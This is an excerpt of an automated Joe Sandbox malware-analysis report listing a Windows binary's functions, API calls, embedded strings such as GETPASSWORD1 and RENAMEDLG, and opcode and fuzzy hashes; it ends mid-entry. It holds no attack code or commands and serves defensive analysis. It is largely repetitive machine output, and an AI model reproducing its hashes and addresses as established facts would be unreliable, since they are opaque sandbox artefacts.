                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                              • API String ID: 176396367-3743748572
                                                              • Opcode ID: 260735e33af1dcb28840e0d9cd8999e49b2a42ba1e2914cb4d74bbfcbd0d8741
                                                              • Instruction ID: c9f8bb0d543fd017fa8b92440ecfaffa3025724bca691c77f2df3f8771673a4e
                                                              • Opcode Fuzzy Hash: 260735e33af1dcb28840e0d9cd8999e49b2a42ba1e2914cb4d74bbfcbd0d8741
                                                              • Instruction Fuzzy Hash: D4314C32A443419ADA30BF949C42776B3E4EB90324F20642FF55DB7381FA50BC4483A5
                                                              Function 00EA1224 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00EA11E8: _free.LIBCMT ref: 00EA1211
                                                              • _free.LIBCMT ref: 00EA1272
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00EA127D
                                                              • _free.LIBCMT ref: 00EA1288
                                                              • _free.LIBCMT ref: 00EA12DC
                                                              • _free.LIBCMT ref: 00EA12E7
                                                              • _free.LIBCMT ref: 00EA12F2
                                                              • _free.LIBCMT ref: 00EA12FD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: dc82fc3354c5e4ab71d31c4d618491636c0f9fb0103f0a225e677c5eaed5ed1d
                                                              • Instruction ID: 83539cc489ae7712b6c2a3bda933800e1294325ee797d5720c10648ee9146386
                                                              • Opcode Fuzzy Hash: dc82fc3354c5e4ab71d31c4d618491636c0f9fb0103f0a225e677c5eaed5ed1d
                                                              • Instruction Fuzzy Hash: 53117C71589B24ABDA20BBF0CC4BFDB77DCAF1A700F401C16F399BA092DA24B6058751
                                                              Function 00E9E189 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00E9DA82,00E9FB08,?,00E9E133,00000001,00000364,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E18E
                                                              • _free.LIBCMT ref: 00E9E1C3
                                                              • _free.LIBCMT ref: 00E9E1EA
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E1F7
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID: x7
                                                              • API String ID: 3170660625-374306512
                                                              • Opcode ID: 7dfb370dfb56833d6f069437a98cf234a88ffec4f67ffdc4af9daedc44748070
                                                              • Instruction ID: 760df18ab8ab88896358db339ed51f970930d5b0fabdb863250cc1701068c85f
                                                              • Opcode Fuzzy Hash: 7dfb370dfb56833d6f069437a98cf234a88ffec4f67ffdc4af9daedc44748070
                                                              • Instruction Fuzzy Hash: 2F0149361456113F9F15A3775D86D2B26AEEBC53653222134F605F2391EE70C8054160
                                                              Function 00E93549 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E935C4,00E93527,00E937C8), ref: 00E93560
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E93576
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E9358B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 6a73ae3d2c68e8a0af947851dca6a20250f2cec0f67adde35edb0048f1d51c5a
                                                              • Instruction ID: f5d9a7c87956313cae68c2bc8a92df57a33ad87b188c88685b201c0846ca0c11
                                                              • Opcode Fuzzy Hash: 6a73ae3d2c68e8a0af947851dca6a20250f2cec0f67adde35edb0048f1d51c5a
                                                              • Instruction Fuzzy Hash: 81F022357403229F4F315F751DC02A622DC6B0EB583162038E905FB210EB20DE4D9AE1
                                                              Function 00E811E6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E84948: _swprintf.LIBCMT ref: 00E8496E
                                                                • Part of subcall function 00E84948: _strlen.LIBCMT ref: 00E8498F
                                                                • Part of subcall function 00E84948: SetDlgItemTextW.USER32(?,00EB3154,?), ref: 00E849EF
                                                                • Part of subcall function 00E84948: GetWindowRect.USER32(?,?), ref: 00E84A29
                                                                • Part of subcall function 00E84948: GetClientRect.USER32(?,?), ref: 00E84A35
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                              • SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0$X+$X+$1
                                                              • API String ID: 2622349952-1204512018
                                                              • Opcode ID: 884dc07fb683518c202cbc27035ee4b1a5afe3ad616873e13b7841be07732ce4
                                                              • Instruction ID: df6965976bd9a72adf3b9b386380fc99a6a14fbeed0a11cca4714b086ba8a122
                                                              • Opcode Fuzzy Hash: 884dc07fb683518c202cbc27035ee4b1a5afe3ad616873e13b7841be07732ce4
                                                              • Instruction Fuzzy Hash: 0EF0813010068DAADF552EA5884DBF93B9CAF85309F056094FE4DB91A1E774C496BB10
                                                              Function 00E9D250 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9D26E
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00E9D280
                                                              • _free.LIBCMT ref: 00E9D293
                                                              • _free.LIBCMT ref: 00E9D2A4
                                                              • _free.LIBCMT ref: 00E9D2B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: @;
                                                              • API String ID: 776569668-3452451375
                                                              • Opcode ID: 9025baa984fc614a49b61f31080de3bdcd04c35fd43c85a8992c7884d533f002
                                                              • Instruction ID: 1661394c7ee44909f2a098045dbb0c6144a1e6f73df90aad08b0ff4bc9c3cbd9
                                                              • Opcode Fuzzy Hash: 9025baa984fc614a49b61f31080de3bdcd04c35fd43c85a8992c7884d533f002
                                                              • Instruction Fuzzy Hash: EFF054B04081B88FCE156F6AFEC24093BE5FB247203552606F4187A2B4CF300909CBD6
                                                              Function 00E9747A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00E97471,00E95B1C,00E94764), ref: 00E97488
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E97496
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E974AF
                                                              • SetLastError.KERNEL32(00000000,00E97471,00E95B1C,00E94764), ref: 00E97501
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 2b42fd04b392a17467a090b2eb2ddaef8cd6cc84371e85993739561f1c08637c
                                                              • Instruction ID: 76dfc3f7ad390fe5a0906c0ff84e46685fa80f8e4a9af6a174ffc02360537632
                                                              • Opcode Fuzzy Hash: 2b42fd04b392a17467a090b2eb2ddaef8cd6cc84371e85993739561f1c08637c
                                                              • Instruction Fuzzy Hash: B801283261D2116EEF111BB66C8695B2F84EB02379331133AF474B51F2EF215C0C9194
                                                              Function 00E83553 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E83577
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,000000FF,000000FF,?,?,?,?,00E82663,000000FF,?,00000800,?,?,00E81CCF,?), ref: 00E83615
                                                              • _wcslen.LIBCMT ref: 00E8368B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 53435ae26bdbdc6e29325aa165cf85fbc094fd2bd739c4a578d80e25affaff61
                                                              • Instruction ID: b4924e5ac434da0742e4879cf662f18b40cc5834ac32b01b3e92abd3f219eb2d
                                                              • Opcode Fuzzy Hash: 53435ae26bdbdc6e29325aa165cf85fbc094fd2bd739c4a578d80e25affaff61
                                                              • Instruction Fuzzy Hash: 0E41DE71500214BACF22FF34CC41EEA77A9AF05B85B106426F81CB6251FB719F90DB60
                                                              Function 00E91D96 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcschr.LIBVCRUNTIME ref: 00E91DC2
                                                                • Part of subcall function 00E900F6: _wcschr.LIBVCRUNTIME ref: 00E90191
                                                                • Part of subcall function 00E87D24: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E82FEC,?,?,?,00E82F99,?,-00000002,?,00000000,?), ref: 00E87D3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcschr$CompareString
                                                              • String ID: <$HIDE$MAX$MIN
                                                              • API String ID: 69343711-3358265660
                                                              • Opcode ID: 7eac719acad11e391968ce90d4e1e17cfd4901f347cd1df672dd7f20bb31cbf9
                                                              • Instruction ID: a195d76e1e32c7300a16a6cf8ba7b9770715500acd23dd45f5c834ed12503bf2
                                                              • Opcode Fuzzy Hash: 7eac719acad11e391968ce90d4e1e17cfd4901f347cd1df672dd7f20bb31cbf9
                                                              • Instruction Fuzzy Hash: 4731833290021AAADF25DB54CC41EEF73ECEB15754F4091A6E905F7181EBB4DE848F50
                                                              Function 00E92D7C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(00020482), ref: 00E92DB8
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,00020482,Function_000102B0,?), ref: 00E92DF4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DialogParamVisibleWindow
                                                              • String ID: B*$B*$GETPASSWORD1
                                                              • API String ID: 3157717868-3857194741
                                                              • Opcode ID: fb37742ffcb6c0d6f98390e1e67700f2fea92344434a3258b5c27b7e38a3d13f
                                                              • Instruction ID: 9d43b978bfffe5f4b6093683396466e20470535aef301f2cab8fe098a3741441
                                                              • Opcode Fuzzy Hash: fb37742ffcb6c0d6f98390e1e67700f2fea92344434a3258b5c27b7e38a3d13f
                                                              • Instruction Fuzzy Hash: 1F1126326002047EDF12DA259C86BAA33D8F74A714F045039BE09BB291C6B5AC49C760
                                                              Function 00E83470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E83497
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • _wcschr.LIBVCRUNTIME ref: 00E834B5
                                                              • _wcschr.LIBVCRUNTIME ref: 00E834C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 525462905-3142399695
                                                              • Opcode ID: c304b2c3d202822a6dfc8d289210d80c40e309d65ad70c4ce23e4d9edccfb05b
                                                              • Instruction ID: 2c7b5ab7cbf2d3786c73ddcd6d9f02d8f4fba207d5c91a24470981a27197db40
                                                              • Opcode Fuzzy Hash: c304b2c3d202822a6dfc8d289210d80c40e309d65ad70c4ce23e4d9edccfb05b
                                                              • Instruction Fuzzy Hash: 0A016D271007117ADA3277758C43D67ABECDF86BB1B64A41AF46CF6082EA20D550C3F1
                                                              Function 00E9071D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 00E9072D
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E90752
                                                              • DeleteObject.GDI32(00000000), ref: 00E90784
                                                              • DeleteObject.GDI32(00000000), ref: 00E907A7
                                                                • Part of subcall function 00E8F8E2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E9077D,00000066), ref: 00E8F8F5
                                                                • Part of subcall function 00E8F8E2: SizeofResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F90C
                                                                • Part of subcall function 00E8F8E2: LoadResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F923
                                                                • Part of subcall function 00E8F8E2: LockResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F932
                                                                • Part of subcall function 00E8F8E2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00E9077D,00000066), ref: 00E8F94D
                                                                • Part of subcall function 00E8F8E2: GlobalLock.KERNEL32(00000000), ref: 00E8F95E
                                                                • Part of subcall function 00E8F8E2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E8F982
                                                                • Part of subcall function 00E8F8E2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E8F9C7
                                                                • Part of subcall function 00E8F8E2: GlobalUnlock.KERNEL32(00000000), ref: 00E8F9E6
                                                                • Part of subcall function 00E8F8E2: GlobalFree.KERNEL32(00000000), ref: 00E8F9ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: c975e0ce9ea50b02fb165b26504ecd1f9fdd03fc2631eb9706dd5631582ac9b3
                                                              • Instruction ID: d4359cd67839766a69cb2b5d1040945db3cfb0f64ba41b2132ee92abfb4682e2
                                                              • Opcode Fuzzy Hash: c975e0ce9ea50b02fb165b26504ecd1f9fdd03fc2631eb9706dd5631582ac9b3
                                                              • Instruction Fuzzy Hash: EB01F9369406056FCB1177A58C49ABF7AFAAF80B75F541025FD08BB392DF319C098BA1
                                                              Function 00E92640 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • EndDialog.USER32(?,00000001), ref: 00E9268B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E926A1
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E926B5
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00E926C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: RENAMEDLG
                                                              • API String ID: 445417207-3299779563
                                                              • Opcode ID: 6e933dbcb907885e92b7695fd79ab2defc46d9ecc4d41ba6ff4a97259aecea48
                                                              • Instruction ID: 59b73c62a5d1b495d55bdec0b2220596aabe93c8f0ce609daaa4fa5305708721
                                                              • Opcode Fuzzy Hash: 6e933dbcb907885e92b7695fd79ab2defc46d9ecc4d41ba6ff4a97259aecea48
                                                              • Instruction Fuzzy Hash: 710128327813597FDE10AF669C48FA777ACEB5E705F010018F341B94E2C2A2A909C775
                                                              Function 00E92B63 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
